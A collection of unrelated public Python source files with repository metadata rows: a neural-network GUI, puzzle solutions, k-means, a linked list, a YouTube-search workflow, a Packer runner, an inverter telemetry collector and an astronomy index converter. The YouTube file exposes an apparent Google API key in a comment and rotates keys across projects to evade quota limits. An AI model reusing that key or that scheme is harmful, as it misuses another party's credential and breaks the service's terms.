        self.load_btn = tk.Button(self, text="LOAD TRAINING DATA", command=self.load_csv)
        self.load_btn.pack(side="top")
        self.epoch_label = tk.Label(self, text="Number of Epochs: ")
        self.epoch_label.pack(side="top")
        self.epoch_spinbox = tk.Spinbox(self, from_=1, to=1000)
        self.epoch_spinbox.pack(side="top")
        self.train_btn = tk.Button(self, text="TRAIN NETWORK", command=self.train_network)
        self.train_btn.pack(side="top")
        self.progress = ttk.Progressbar(self, length=200, mode='determinate')
        self.progress.pack(side="top")
        self.save_model_btn = tk.Button(self, text="SAVE MODEL", command=self.save_model)
        self.save_model_btn.pack(side="top")
        self.load_model_btn = tk.Button(self, text="LOAD MODEL", command=self.load_model)
        self.load_model_btn.pack(side="top")
        self.run_model_btn = tk.Button(self, text="RUN MODEL", command=self.run_model)
        self.run_model_btn.pack(side="top")
    def load_csv(self):
        """
        Load the CSV file using a file dialog and preprocess the data.

        NOTE(review): if the dialog is cancelled, file_path is '' and
        pd.read_csv will raise; assumes the CSV has a 'target' column.
        """
        file_path = filedialog.askopenfilename()
        df = pd.read_csv(file_path)
        self.X_train, self.y_train = libSimpleNnet.preprocess_data(df, 'target')
    def update_progress(self, value):
        """
        Update the progress bar.
        """
        self.progress["value"] = value
        self.update_idletasks()
    def update_loss_plot(self, losses, epoch):
        """
        Update the loss plot.

        NOTE(review): the 'losses' parameter is ignored; self.losses is
        plotted instead. Either drop the parameter or use it.
        """
        self.loss_plot.clear()
        self.loss_plot.plot(range(epoch+1), self.losses[:epoch+1], 'r')  # Use self.losses directly
        self.canvas.draw()
    def train_network(self):
        """
        Train the LSTM model and update the progress bar and loss plot.
        """
        if not hasattr(self, 'X_train') or not hasattr(self, 'y_train'):
            tk.messagebox.showerror("Error", "No data loaded for training. Please load a data file first.")
            return
        epochs = int(self.epoch_spinbox.get())
        self.losses = []  # Initialize losses before training
        callback = libSimpleNnet.ProgressCallback(self)
        self.model, self.history = libSimpleNnet.train_model(self.X_train, self.y_train, callback=callback, epochs=epochs)
        self.losses = self.history.history['loss']  # Update losses after training
    def update_epoch_progress(self, epoch):
        """
        Update the text widget to display the progress of each epoch.

        NOTE(review): self.progress_text is never created in
        create_widgets, so calling this raises AttributeError.
        """
        self.progress_text.delete('1.0', tk.END)
        self.progress_text.insert(tk.END, f"Completed {epoch} out of {self.epoch_spinbox.get()} epochs")
    def save_model(self):
        """
        Save the trained model to a file.
        """
        if not hasattr(self, 'model'):
            tk.messagebox.showerror("Error", "No model has been trained yet.")
            return
        file_path = filedialog.asksaveasfilename(defaultextension=".h5")
        if file_path:
            libSimpleNnet.save_model(self.model, file_path)
    def load_model(self):
        """
        Load a previously saved model from a file.
        """
        file_path = filedialog.askopenfilename(filetypes=(("HDF5 files", "*.h5"),))
        if not file_path:
            return
        try:
            self.model = libSimpleNnet.load_model_from_file(file_path)
        except Exception as e:
            tk.messagebox.showerror("Error", f"Failed to load model. Error: {str(e)}")
    def run_model(self):
        """
        Run the model on input data from the user.
        """
        if not hasattr(self, 'model'):
            tk.messagebox.showerror("Error", "No model has been loaded or trained yet.")
            return
        input_string = simpledialog.askstring("Input", "Enter your input data:")
        try:
            input_data = libSimpleNnet.preprocess_data_array(input_string)
            result = self.model.predict(input_data)
            tk.messagebox.showinfo("Model Output", f"The model's output is: {result[0]}")  # Assuming the output is a single value
        except Exception as e:
            tk.messagebox.showerror("Error", f"Failed to run model. Error: {str(e)}")
# Bootstrap: create the Tk root window, mount the Application frame and
# enter the event loop (blocks until the window is closed).
root = tk.Tk()
app = Application(master=root)
app.mainloop()
| asparks1987/libsimplennet | simpleNnetGUI.py | simpleNnetGUI.py | py | 5,154 | python | en | code | 0 | github-code | 13 |
4210417730 | import math
from typing import List
class Solution:
    def minEatingSpeed(self, piles: List[int], h: int) -> int:
        """Return the smallest integer eating speed that finishes every
        pile within h hours (LeetCode 875, 'Koko Eating Bananas').

        Binary-searches the answer in [1, max(piles)]; each candidate
        speed is checked in O(len(piles)).
        """
        def hours_needed(speed: int) -> int:
            # Integer ceiling of p / speed, summed over all piles.
            return sum((p + speed - 1) // speed for p in piles)

        lo, hi = 1, max(piles)
        best = 0
        while lo <= hi:
            mid = lo + (hi - lo) // 2
            if hours_needed(mid) <= h:
                best = mid        # feasible: try a slower speed
                hi = mid - 1
            else:
                lo = mid + 1      # too slow: need a faster speed
        return best
print(Solution().minEatingSpeed([3, 6, 7, 11], 8))
| mhasan09/leetCode_M | koko_eating_banananas.py | koko_eating_banananas.py | py | 650 | python | en | code | 0 | github-code | 13 |
26624124389 | from _collections import deque
# Read the board size n and the merge bounds l, r, then the n x n grid
# of populations (BOJ 16234 'Population Movement' style input).
n, l ,r = map(int, input().split())
data = []
for i in range(n):
    temp = list(map(int, input().split()))
    data.append(temp)
def bfs( x, y, index):
    """Flood-fill the union that contains cell (x, y).

    Neighbouring cells join the union when the absolute population
    difference is within [l, r]. All member cells are labelled *index*
    in the global 'union' grid and their values in 'data' are replaced
    by the union average (integer division). Returns the union size.
    """
    q = deque()
    # Initial setup: enqueue the start cell and mark it visited.
    q.append([x,y])
    union[x][y] = index
    dx = [0,0,1,-1]
    dy = [1,-1,0,0]
    union_list = []
    union_list.append([x,y])
    num = 1
    total = data[x][y]
    while q:
        row, col = q.popleft()
        for i in range(4):
            nx = row + dx[i]
            ny = col + dy[i]
            if nx >=0 and nx <n and ny>=0 and ny< n:
                t1 = data[row][col]
                t2 = data[nx][ny]
                diff = abs(t1-t2)
                # Even if the difference condition holds, the cell must
                # not have been visited yet!
                if diff >=l and diff <=r and union[nx][ny] == -1 :
                    union_list.append([nx,ny])
                    union[nx][ny] = index
                    q.append([nx,ny])
                    num += 1
                    total += data[nx][ny]
    # Distribute the averaged population back over the whole union.
    for i,j in union_list:
        data[i][j] = total//num
    return num
# Repeat whole-board merges until no union spans more than one cell
# (index == n*n means every cell formed its own union), counting days.
total_count = 0
while True:
    index = 0
    # Visited/label grid for this round (-1 = unvisited).
    union = [[-1] * n for _ in range(n)]
    # Run bfs from every still-unvisited cell.
    for i in range(n):
        for e in range(n):
            if union[i][e] == -1:
                bfs(i,e,index)
                index += 1
    if index == n*n :
        break
    total_count += 1
print(total_count)
| isakchoe/TIL | algorithm /dfs_bfs/ex_21.py | ex_21.py | py | 1,521 | python | en | code | 0 | github-code | 13 |
26161460535 | # encoding: utf-8
import sys
from workflow import Workflow, ICON_WEB, web
#API_KEY = 'AIzaSyAWrIPT4uIsUkymkPdvK3RJ-S6PNr-LMI0'
list_of_apis = [
#this is to avoid quota
#make sure the api keys are from different projects. So i had to make 8 projects. each project's api key goes here.
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>',
'<your youtube api keys go here... for regular uses 5-6 keys are enough...>'
]
# Return the first API key that responds correctly; each key is probed
# by fetching the snippet of a known sample video.
def working_api():
    """Probe list_of_apis in order and return the first usable key.

    NOTE(review): implicitly returns None when every key fails (callers
    then send key=None), and the broad except hides network errors.
    """
    for api in list_of_apis:
        try:
            r = web.get('https://www.googleapis.com/youtube/v3/videos', dict(key=api, part='snippet', id='2lAe1cqCOXo'))
            if r.json()['kind'] == 'youtube#videoListResponse':
                return(api)
        except Exception:
            pass
def main(wf):
    """Alfred workflow entry: search YouTube for wf.args[0] and emit up
    to 50 results as Alfred items (arg = medium thumbnail URL)."""
    url='https://www.googleapis.com/youtube/v3/search'
    params= dict(key=working_api(), part='snippet', type='video', safeSearch='none' , maxResults=50, q=wf.args[0])
    r = web.get(url, params)
    # throw an error if request failed
    # Workflow will catch this and show it to the user
    r.raise_for_status()
    # Parse the JSON returned by the YouTube API and extract the items
    result = r.json()
    posts = result['items']
    #print(type(posts[0]['snippet']['description']))
    #print(posts[0]['snippet']['description'])
    # Loop through the returned posts and add an item for each to
    # the list of results for Alfred
    for post in posts:
        wf.add_item(title=post['snippet']['title'],
                    #subtitle = get_video_duration(post['id']['videoId'])+' | '+post['snippet']['channelTitle'],
                    subtitle = post['snippet']['channelTitle']+' | '+post['snippet']['publishedAt'],
                    arg='https://i.ytimg.com/vi/'+post['id']['videoId']+'/mqdefault.jpg',
                    valid=True,
                    icon='')
    # Send the results to Alfred as XML
    wf.send_feedback()
if __name__ == u"__main__":
    wf = Workflow()
    sys.exit(wf.run(main))
25930015725 | # Copyright (c) 2012-2017, Andreas Heumaier<andreas.heumaier@microsoft.com>
# All rights reserved.
#
# See LICENSE file for full license.
#
# Packer build runnner
#
import subprocess
TEMPLATE = 'gitlab-ubuntu-docker.json'
VARFILE = 'varfile'
def validate(template=TEMPLATE):
    """Run 'packer validate' on *template* with the shared var file.

    Raises subprocess.CalledProcessError on a non-zero exit status.
    The original used subprocess.call and ignored the return code, so
    the caller's try/except around validate() could never trigger.
    Windows-only: relies on cmd.exe 'start /wait'.
    """
    print("execute validate")
    subprocess.check_call('start /wait packer validate -var-file='+str(VARFILE)+'.json '+str(template), shell=True)
def run(template=TEMPLATE):
    """Run 'packer build' on *template* with the shared var file.

    NOTE(review): the subprocess return code is ignored, so a failed
    build is not reported; Windows-only ('start /wait' via cmd.exe).
    """
    print('execute runner')
    subprocess.call('start /wait packer build -var-file='+str(VARFILE)+'.json '+str(template), shell=True)
if __name__ == "__main__":
    # Validate first; only build when validation succeeds.
    try:
        validate()
    except Exception:
        # 'except Exception' instead of a bare except: no longer
        # swallows KeyboardInterrupt/SystemExit.
        print("ERROR: Validate Failed")
        exit(1)
    else:
        run()
else:
    print("runPacker.py is being imported into another module")
| aheumaier/GitlabDemo | setup.py | setup.py | py | 831 | python | en | code | 2 | github-code | 13 |
10152525504 | import json
import os
import string
from collections import defaultdict
from importlib.resources import files
from fontTools import unicodedata
STRUCTURE = "IDEOGRAPHIC DESCRIPTION CHARACTER"
DATA_DIR = files("ids_py.data")
CHARACTERS_COMPOSITION_PATH = DATA_DIR.joinpath("IDS_characters_composition.json")
COMPONENTS_TO_CHARACTERS_PATH = DATA_DIR.joinpath("IDS_components_to_characters.json")
with open(CHARACTERS_COMPOSITION_PATH, "r", encoding="utf-8") as file:
characters = json.loads(file.read())
with open(COMPONENTS_TO_CHARACTERS_PATH, "r", encoding="utf-8") as file:
components_to_characters = json.loads(file.read())
character_structures = "⿰⿱⿲⿳⿴⿵⿶⿷⿸⿹⿺⿻"
def _component_order(composition):
    """Pair each component character with its governing IDC structure
    character, in reading order.

    Returns a list of 2-tuples: the first component after a structure
    character is emitted as (component, structure); subsequent ones as
    (structure, component). ASCII (string.printable) characters and
    characters without a Unicode name are skipped; anything after a
    tab in *composition* is ignored.
    """
    compo_order = []
    structure = ""
    count = 0
    if "\t" in composition:
        composition = composition.split("\t")[0]
    for char in composition:
        try:
            name = unicodedata.name(char)
        except:
            # NOTE(review): bare except; unicodedata.name raises
            # ValueError for unnamed code points -- narrowing would be
            # safer.
            continue
        if not name:
            continue
        if STRUCTURE in name:
            # New IDC structure character: following components belong
            # to it; reset the positional counter.
            structure = char
            count = 0
        else:
            if char in string.printable:
                continue
            if count == 0:
                compo_order.append((char, structure))
            else:
                compo_order.append((structure, char))
            count = 1
    return compo_order
def _structure(composition):
    """Return the concatenation of every IDC (Ideographic Description
    Character) structure character occurring in *composition*."""
    structure = ""
    for char in composition:
        try:
            if STRUCTURE in unicodedata.name(char):
                structure += char
        except ValueError:
            # unicodedata.name() raises ValueError for code points
            # without a name; the original bare except also hid
            # unrelated errors.
            pass
    return structure
def _flatten_composition(character, character_composition=None):
    """Recursively expand *character* into its nested component tree.

    Returns a list whose items are either leaf component strings or
    single-key dicts mapping a compound component to its own flattened
    composition. The second parameter is kept only for backward
    compatibility: the original immediately rebound it (and used a
    mutable default list); it is never read.
    """
    result = []
    composition = characters.get(character)
    if composition is None:
        return result
    for component in composition:
        sub = characters.get(component)
        if sub is not None and len(sub) > 1:
            # Compound component: recurse one level deeper.
            result.append({component: _flatten_composition(component)})
        else:
            result.append(component)
    return result
def structure(character):
    """Return the IDC structure string of *character*, or None when the
    character is not in the composition table.

    Previously an unknown character passed None into _structure(),
    which raised TypeError while iterating it.
    """
    composition = characters.get(character)
    if composition is None:
        return None
    return _structure(composition)
def structural_composition(character):
    """Return the (component, structure) pairs of *character* as built
    by _component_order(), or None when the character is unknown.

    Previously an unknown character passed None into
    _component_order(), which raised TypeError.
    """
    composition = characters.get(character)
    if composition is None:
        return None
    return _component_order(composition)
def composition(character, flatten=False):
    """Return the composition of *character*.

    With flatten=False, the raw table entry (or None when absent) is
    returned; with flatten=True, the fully expanded nested component
    tree from _flatten_composition() is built instead.
    """
    if flatten:
        return _flatten_composition(character)
    return characters.get(character, None)
def used_by(component, structure=None):
    """Return the characters that use *component*.

    With structure=None: the raw string/sequence of characters from the
    reverse index ('' when unknown). With a structure given: a
    defaultdict mapping structure strings to character lists, filtered
    to that structure unless structure == 'all'.
    """
    chars = components_to_characters.get(component, "")
    if structure is None:
        return chars
    else:
        structures = defaultdict(list)
        for char in chars:
            # NOTE(review): a char missing from 'characters' makes
            # composition None and _structure(None) raise TypeError.
            composition = characters.get(char, None)
            s = _structure(composition)
            if structure != "all" and s != structure:
                continue
            structures[s].append(char)
        return structures
def similar_to(character):
    """Find characters sharing a (component, structure) pair with
    *character* at the same position.

    Returns a defaultdict mapping each positional pair of *character*
    to the list of other characters that have the identical pair at
    the same index of their own structural composition.
    """
    composition = characters.get(character, None)
    similar = defaultdict(list)
    if composition is not None:
        for index, compo in enumerate(_component_order(composition)):
            # All characters that use this component anywhere.
            characters_used_by = used_by(compo[0])
            for character_used_by in characters_used_by:
                _character_used_by = characters.get(character_used_by, None)
                compo_order = _component_order(_character_used_by)
                if index < len(compo_order):
                    if compo == compo_order[index]:
                        similar[compo].append(character_used_by)
    return similar
| BlackFoundryCom/ids-py | src/ids_py/__init__.py | __init__.py | py | 3,995 | python | en | code | 1 | github-code | 13 |
14655281434 | # -*- coding:utf-8 -*-
import sys
from importlib import reload
reload(sys)
sys.setdefaultencoding('utf-8')
import numpy as np
#from numpy import *
#计算欧式距离
def distEcloud(vecA, vecB):
    """Return the Euclidean distance between two vectors / matrix rows."""
    diff = vecA - vecB
    return np.sqrt(np.sum(diff ** 2))
#随机设置K个中心点
def randCenter(dataSet, k):
    """Draw k random initial centroids, uniformly within each feature's
    [min, max] range of *dataSet* (an np.mat, one sample per row)."""
    n_features = np.shape(dataSet)[1]
    centers = np.mat(np.zeros([k, n_features]))
    for j in range(n_features):
        col_min = np.min(dataSet[:, j])
        col_range = float(np.max(dataSet[:, j]) - col_min)
        centers[:, j] = np.mat(col_min + col_range * np.random.rand(k, 1))
    return centers
def KMeans(dataSet, k, distMeans=distEcloud, createCent=randCenter):
    """Classic k-means on *dataSet* (np.mat, one sample per row).

    Returns (centroids, assignments); assignments row i holds the
    cluster index and the squared distance of sample i. Iterates until
    no assignment changes; prints the centroids each round.
    """
    m = np.shape(dataSet)[0]  # number of rows, i.e. number of samples
    clusterAssement = np.mat(np.zeros([m, 2]))  # m x 2 matrix: [cluster index, squared distance]
    centroids = createCent(dataSet, k)  # initialize k centroids
    clusterChanged = True
    while clusterChanged:
        clusterChanged = False
        for i in range(m):
            minDist = np.inf  # start at infinity
            minIndex = -1
            for j in range(k):
                # inner loop: distance from each of the k centroids to
                # sample i; the outer loop covers all samples
                distJ = distMeans(centroids[j, :], dataSet[i, :])
                if distJ < minDist:
                    minDist = distJ  # update the smallest distance
                    minIndex = j
            if clusterAssement[i, 0] != minIndex:  # loop terminates once no assignment changes
                clusterChanged = True
            clusterAssement[i, :] = minIndex, minDist ** 2  # store cluster index and squared min distance
        print(centroids)
        # Recompute each centroid's position
        for cent in range(k):
            ptsInClust = dataSet[np.nonzero(clusterAssement[:, 0].A == cent)[0]]  # select the samples assigned to cluster 'cent'
            centroids[cent, :] = np.mean(ptsInClust, axis=0)  # updated centroid
    return centroids, clusterAssement
def KMeans1(dataset, k, distMeans=distEcloud):
    """K-means variant; same contract as KMeans but without a pluggable
    centroid initializer.

    Fixes over the original: (1) the 'distMeans' parameter is now
    actually used (the original always called distEcloud directly);
    (2) the assignment matrix is sized n_samples x 2 ([cluster index,
    squared distance]) -- the original allocated n_samples x n_features,
    which only worked because the demo data has exactly two features.
    Prints each cluster's members every round (preserved debug output).
    """
    n_samples = np.shape(dataset)[0]
    clusterMat = np.mat(np.zeros([n_samples, 2]))
    center_point = randCenter(dataset, k)
    clusterChanged = True
    while clusterChanged:
        clusterChanged = False
        for i in range(n_samples):
            minDist = np.inf
            minIndex = -1
            for j in range(k):
                distJ = distMeans(center_point[j, :], dataset[i, :])
                if distJ < minDist:
                    minDist = distJ
                    minIndex = j
            if clusterMat[i, 0] != minIndex:
                clusterChanged = True
            clusterMat[i, :] = [minIndex, minDist ** 2]
        for cent in range(k):
            # NOTE(review): an empty cluster makes np.mean return nan
            # with a RuntimeWarning; unchanged from the original.
            ptsInClust = dataset[np.nonzero(clusterMat[:, 0].A == cent)[0]]
            center_point[cent, :] = np.mean(ptsInClust, axis=0)
            print(ptsInClust)
    return center_point, clusterMat
dataSetMatrix=np.mat([
[0.90796996, 5.05836784]
, [-2.88425582, 0.01687006]
, [-3.3447423, -1.01730512]
, [-0.32810867, 0.48063528]
, [1.90508653, 3.530091]
, [-3.00984169, 2.66771831]
, [-3.38237045, -2.9473363]
, [2.22463036, -1.37361589]
, [2.54391447, 3.21299611]
, [-2.46154315, 2.78737555]
, [-3.38237045, -2.9473363]
, [2.8692781, -2.54779119]
, [2.6265299, 3.10868015]
, [-2.46154315, 2.78737555]
, [-3.38237045, -2.9473363]
, [2.80293085, -2.7315146]
]
)
#distEcloud计算点与点之间的距离-测试
#vecA=np.array([1,0])
#vecB=np.array([4,4])
#print distEcloud(vecA,vecB)
#201907201715 update
center,cluster=KMeans1(dataSetMatrix,5)
print(center)
print(cluster)
| bgmlxxlmgb/PythonApp | src/core/main/algorithmic/classify/CLuster-KMeans.py | CLuster-KMeans.py | py | 3,789 | python | en | code | 0 | github-code | 13 |
class Node:
    """A single element of a singly linked list."""

    def __init__(self, data):
        self.data = data  # payload carried by this node
        self.next = None  # following node, or None at the tail
class LinkedList:
    """Singly linked list supporting append, prepend, delete and print."""

    def __init__(self):
        self.head = None  # first node, or None when the list is empty

    def print_list(self):
        """Print each node's data on its own line, head to tail."""
        node = self.head
        while node is not None:
            print(node.data)
            node = node.next

    def append(self, data):
        """Add a node holding *data* at the tail (O(n) walk)."""
        fresh = Node(data)
        if self.head is None:
            self.head = fresh
            return
        tail = self.head
        while tail.next is not None:
            tail = tail.next
        tail.next = fresh

    def prepend(self, data):
        """Add a node holding *data* at the head (O(1))."""
        fresh = Node(data)
        fresh.next = self.head
        self.head = fresh

    def delete_node(self, key):
        """Remove the first node whose data equals *key*; no-op when absent."""
        node = self.head
        if node is not None and node.data == key:
            self.head = node.next
            return
        prev = None
        while node is not None and node.data != key:
            prev = node
            node = node.next
        if node is None:
            return
        prev.next = node.next
# Demo: build A -> B -> C -> D, delete B, prepend E; prints E, A, C, D.
llist = LinkedList()
llist.append('A')
llist.append('B')
llist.append('C')
llist.append('D')
llist.delete_node('B')
llist.prepend('E')
llist.print_list()
| rvirjn/data-science | ds/singly_linked_list.py | singly_linked_list.py | py | 1,302 | python | en | code | 2 | github-code | 13 |
549158344 | import os
if 'APP_CONFIG' not in os.environ:
os.environ['APP_CONFIG'] = '/brum/dev/PowerMeter/scripts/config/bat_inverter.yaml'
"""
Based on MODBUS-HTML_SI44M-80H-13_32009R_V10
"""
import time
import datetime
from lib import log, config
from lib.quicklock import lock
from lib.telemetry import send_data_lines
from common.tracker import Tracker
from common.modbus import ModbusDataCollector, RegisterType
TRACKERS = [
Tracker('discharge', 'inverter.battery.supply', {"source": "sunny_island", "src": "sma"}, True, True, True, False, True),
Tracker('charge', 'inverter.battery.consume', {"source": "sunny_island", "src": "sma"}, True, True, True, False, True),
Tracker('discharge.total', 'inverter.battery.supply.total', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
Tracker('charge.total', 'inverter.battery.consume.total', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
Tracker('bat.SOC', 'inverter.battery.SOC', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
Tracker('event.code', 'inverter.battery.status', {"source": "sunny_island", "src": "sma"}, False, False, False, True, False),
]
MODBUS_DATA_COLLECTOR = ModbusDataCollector([
(30845, RegisterType.U32, 'bat.SOC'),
(30849, RegisterType.S32_F1, 'bat.temp'),
(31393, RegisterType.U32, 'charge'),
(31395, RegisterType.U32, 'discharge'),
(31397, RegisterType.U64, 'charge.total'),
(31401, RegisterType.U64, 'discharge.total'),
(30247, RegisterType.U32, 'event.code'),
])
def update():
    """Sample the inverter once per 5-second boundary.

    Called once a second by the main loop; does nothing unless the
    current wall-clock second is a multiple of 5, then reads all modbus
    registers and feeds the values to every tracker.
    """
    if datetime.datetime.now().second % 5 != 0:
        return
    data_dict = MODBUS_DATA_COLLECTOR.read()
    for tracker in TRACKERS:
        tracker.track(data_dict)
def send():
    """Flush the accumulated tracker data to telemetry.

    Collects the data lines of every tracker, resets each tracker for
    the next interval, and sends everything under the 'power' topic.
    """
    data_lines = []
    for tracker in TRACKERS:
        data_lines.extend(tracker.get_data_lines())
        tracker.reset()
    send_data_lines("power", data_lines)
    # print("=" * 40)
    # for data_line in data_lines:
    #     print(data_line)
if __name__ == "__main__":
    # Single-instance guard: lock() raises RuntimeError when another
    # collector is already running.
    try:
        lock()
    except RuntimeError:
        exit(0)
    log("Starting SunnyIsland data collector")
    MODBUS_DATA_COLLECTOR.connect(config["address"], 502, 3)
    while True:
        # Sample every second for the rest of the current minute, then
        # flush one telemetry batch per minute.
        current_minute = datetime.datetime.now().minute
        while datetime.datetime.now().minute == current_minute:
            update()
            time.sleep(1)
        send()
| funnybrum/PowerMeter | scripts/bat_inverter.py | bat_inverter.py | py | 2,431 | python | en | code | 0 | github-code | 13 |
37862285443 | from __future__ import print_function
from PyAstronomy.pyaC import pyaErrors as PE
import numpy as np
class SMW_RHK:
    """Convert the Mount-Wilson S-index into the R_HK activity index."""
    def __init__(self, ccfs="rutten", afc="middelkoop", rphot="noyes"):
        """
        Converting Mount-Wilson S-index into RHK index.
        The Mount-Wilson S-index is a measure of the emission-line cores
        of the Ca II H and K lines at about 3933 A and 3968 A in two
        narrow bands normalized by two adjacent continuum bands.
        The activity index RHK is closely related to the S-index. In
        particular, it gives the emission in the narrow bands normalized
        by the bolometric brightness of the star
        .. math::
            R_{HK} = \\frac{4\\pi R_s^2 (F_H + F_K)}{4\\pi R_s^2\\sigma T_{eff}^4} = \\frac{F_H+F_K}{\\sigma T_{eff}^4} \\; .
        The stellar surface flux in "arbitrary units" in the narrow
        H and K bands (fH + fK) is related to the Mount-Wilson S-index
        through the relation
        .. math::
            f_H + f_K = S C_{cf} T_{eff}^4 10^{-14} \\; ,
        where Ccf is a conversion factor, which can be parameterized in terms of
        the B-V color and the luminosity class. The conversion between
        arbitrary units and physical units, needed to derive the true surface
        flux and the RHK index, has been derived by several authors
        starting with Middelkoop 1982.
        Their factor was also used by Noyes et al. 1984---in particular in their
        appendix a, where is appears implicitly. Later, the value of the conversion
        factor has been revised by several authors, e.g., Oranje 1983 and Rutten 1984,
        who estimated a value about 70% larger than previously proposed. Hall et al.
        2007 derive a value 40% larger than that of Middelkoop 1982 and provide
        a thorough discussion on the differences between the individual approaches
        and results given in the literature.
        Finally, the RHK index thus derived still covers a photospheric
        contribution, which is always present and not related to the
        chromosphere. To obtain the purely chromospheric, primed RHK index,
        an estimate of the photospheric surface flux in the H and K pass-bands
        has to be subtracted. For active stars, the photospheric correction
        is usually quite irrelevant. For inactive, quiet stars, it can,
        however, be important.
        The issue of the Mount-Wilson S-index conversion has been revisited
        by Mittag et al. 2013, who provide an alternative conversion procedure
        and revised photospheric corrections for various luminosity classes.
        .. note:: In the default configuration, the conversion of the S-index
                  into RHK is identical to the relation stated by Noyes et al. 1984
                  in their appendix (a)
        .. math::
            R_{HK} = 1.340 \\times 10^{-4} C_{cf} S
        where the factor 1.34e-4 is a combination of the conversion from
        arbitrary to physical units, 1e-14, and the Stefan-Boltzmann
        constant, in particular 1.34e-4 = 7.6e5*1e-14/5.67e-5. The Ccf factor
        is, however, calculated according to Rutten 1984.
        The relations and coefficients used here are taken from the
        following publications (and references therein):
        - Middelkoop 1982, A&A 107, 31
        - Oranje 1983, A&A 124, 43
        - Noyes et al. 1984, A&A 279, 763
        - Rutten 1984, A&A 130, 353
        - Hall et al. 2007, AJ 133, 862
        - Mittag et al. 2013, A&A 549, 117
        Parameters
        ----------
        ccfs : string, {rutten, noyes}, optional
            Source of the conversion factor between S-index and RHK.
        afc : string, {rutten, oranje, middelkoop, hall}, optional
            Source of conversion factor between "arbitrary units"
            and physical units of surface flux.
        rphot : string, {noyes}
            The source for the photospheric correction for the RHK
            index.
        """
        # Bind the chosen Ccf and photospheric-correction methods once.
        if ccfs == "rutten":
            self._log10ccf = self.log10ccfRutten
        elif ccfs == "noyes":
            self._log10ccf = self.log10ccfNoyes
        else:
            raise(PE.PyAValError("No such Ccf source: " + str(ccfs), \
                                 solution="Use 'rutten' or 'noyes'."))
        self._ccfs = ccfs
        if rphot == "noyes":
            self._logrphot = self.logRphotNoyes
        else:
            raise(PE.PyAValError("No such source for the photospheric correction: " + str(rphot), \
                                 solution="Use 'noyes'."))
        self._rphots = rphot
        self._afc = afc
        # The conversion factor from "arbitrary units" to physical units.
        self._absCal = {"rutten":1.29e6, "oranje":1.21e6, "middelkoop": 7.6e5, "hall":1.07e6}
        if not self._afc in self._absCal:
            raise(PE.PyAValError("No such source for the conversion from arbitrary to physical units: " + str(self._afc), \
                                 solution="Use either of: " + ', '.join(self._absCal.keys()) ))
        from PyAstronomy.pyasl import _ic
        if not _ic.check["quantities"]:
            raise(PE.PyARequiredImport("The 'quantities' package is not installed, which is required to use 'SMW_RHK'.", \
                                       where="SMW_RHK", \
                                       solution="Install quantities (https://pypi.python.org/pypi/quantities/0.10.1)."))
        from PyAstronomy import constants as PC
        self._pc = PC.PyAConstants()
        # All fluxes below are handled in cgs units.
        self._pc.setSystem("cgs")
    def logRphotNoyes(self, bv, lc="ms"):
        """
        Photospheric contribution to surface flux in the H and K pass-bands.
        Relation given by Noyes et al. 1984.
        Parameters
        ----------
        bv : float
            B-V color [mag]
        lc : string, {ms, g}, optional
            Luminosity class.
        Returns
        -------
        log10(Rphot) : float
            Logarithm of the photospheric contribution.
        """
        if (bv < 0.44) or (bv > 0.82):
            PE.warn(PE.PyAValError("Noyes et al. 1984 give a validity range of 0.44 < B-V < 0.82 for the " + \
                                   "photospheric correction. However, the authors use it for B-V > 0.82, " + \
                                   "where it quickly decreases."))
        if lc != "ms":
            PE.warn(PE.PyAValError("Noyes et al. 1984 specify the photospheric correction only for main-sequence stars."))
        # Cubic polynomial in B-V from Noyes et al. 1984.
        rp = -4.898 + 1.918*bv**2 - 2.893*bv**3
        return rp
    def log10ccfNoyes(self, bv, **kwargs):
        """
        Ccf conversion factor according to Noyes et al. 1984.
        Parameters
        ----------
        bv : float
            The B-V color [mag].
        Returns
        -------
        log10(Ccf) : float
            The logarithm of the conversion factor.
        """
        if ("lc" in kwargs) and (kwargs["lc"] != "ms"):
            PE.warn(PE.PyAValError("The Ccf conversion factor by Noyes et al. 1984 is only valid for main-sequence stars.", \
                                   solution="Use the conversion factor by Rutten 1984 for giants."))
        logccf = 1.13*bv**3 - 3.91*bv**2 + 2.84*bv - 0.47
        if bv <= 0.63:
            # Blue-side correction term applied for B-V <= 0.63.
            x = 0.63 - bv
            dlogccf = 0.135*x - 0.814*x**2 + 6.03*x**3
            logccf += dlogccf
        return logccf
    def log10ccfRutten(self, bv, lc="ms"):
        """
        Ccf conversion factor from Rutten 1984 (Eqs. 10a and 10b).
        Parameters
        ----------
        bv : float
            B - V color [mag].
        lc : string, {ms, g}, optional
            Specifies whether the relation for
            main-sequence (ms) or giant (g) stars
            shall be evaluated.
        Returns
        -------
        log10(Ccf) : float
            The logarithm of the conversion factor.
        """
        if lc == "ms":
            if (bv < 0.3) or (bv > 1.6):
                PE.warn(PE.PyAValError("B-V color out of range. Rutten 1984 states a validity range of 0.3 <= b-v <= 1.6 " +
                                       "for main-sequence stars. You specified: " + str(bv) + "."))
            logccf = 0.25*bv**3 - 1.33*bv**2 + 0.43*bv + 0.24
        elif lc == "g":
            if (bv < 0.3) or (bv > 1.7):
                PE.warn(PE.PyAValError("B-V color out of range. Rutten 1984 states a validity range of 0.3 <= b-v <= 1.7 " +
                                       "for giant stars. You specified: " + str(bv) + "."))
            logccf = -0.066*bv**3 - 0.25*bv**2 - 0.49*bv + 0.45
        else:
            raise(PE.PyAValError("No such luminosity class: " + str(lc), \
                                 solution="Specify either 'ms' or 'g'."))
        return logccf
    def FHFK(self, S, Teff, log10ccf):
        """
        Calculate the FH+FK flux in arbitrary units.
        Parameters
        ----------
        S : float
            Mount-Wilson S-index.
        Teff : float
            The effective temperature [K].
        log10ccf : float
            The logarithm of the Ccf conversion factor.
        Returns
        -------
        FH + FK : float
            The stellar surface flux in the H and K pass-bands
            in arbitrary units (not erg/cm**2/s).
        """
        ccf = 10.0**log10ccf
        # fH + fK = S * Ccf * Teff^4 * 1e-14 (see class docstring).
        fhfk = S * ccf * Teff**4 * 1e-14
        return fhfk
    def SMWtoRHK(self, S, Teff, bv, lc="ms", verbose=False):
        """
